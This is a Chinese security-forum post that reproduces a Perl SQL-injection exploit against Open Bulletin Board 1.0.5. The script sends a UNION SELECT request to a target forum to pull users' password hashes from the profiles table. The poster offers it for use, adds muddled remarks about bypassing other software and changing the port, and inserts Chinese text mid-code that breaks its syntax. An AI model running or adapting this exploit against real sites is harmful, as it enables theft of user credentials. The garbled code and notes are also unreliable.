|
 | 作者: jio [sujlx]
 论坛用户 |
登录 |
| #!/usr/bin/perl -w # OpenBB sql injection # tested on Open Bulletin Board 1.0.5 with mysql # (c)oded by x97Rang 2005 RST/GHC # Gr33tz: __blf, 1dt.w0lf use IO::Socket; if (@ARGV != 3) (3为你读取的复数 { print "\nUsage: $0 [server] [path] [id]\n"; print "like $0 forum.mysite.com / 1\n"; print "If found nothing - forum NOT vulnerable\n\n"; exit (); } $server = $ARGV[0]; $path = $ARGV[1]; SQL $id = $ARGV[2]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "160"); printf $socket ("GET %sindex.php?CID=999+union+select+1,1,password,1,1,1,1,1,1,1,1,id,1+from+profiles+where+id=$id/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", (密码测试为1) $path,$server,$id); while(<$socket>) { if (/\>(\w{32})\</) { print "$1\n"; } 大家可以知道,我要用这代码的原因,因为我已经在KJDEI里面测试了一脚本的小程序,里面基本已经测试了,可以饶过IEDK里面的小程序 If found nothing - forum NOT vulnerable\n\n(需要NY来执行该子严官,关于子严官,我会发在论坛上的,到时候可以得到了 注明:$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "160"); 上面的160我以前是80的, 如果大家可以用的话,用以前的80吧,现在的160只用在流光里面的JUEK里面的一个小部分! 就先这样多了,谢谢 |
| 地主 发表时间: 06-07-15 21:23 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: OpenBB1.0.5php注入攻击代码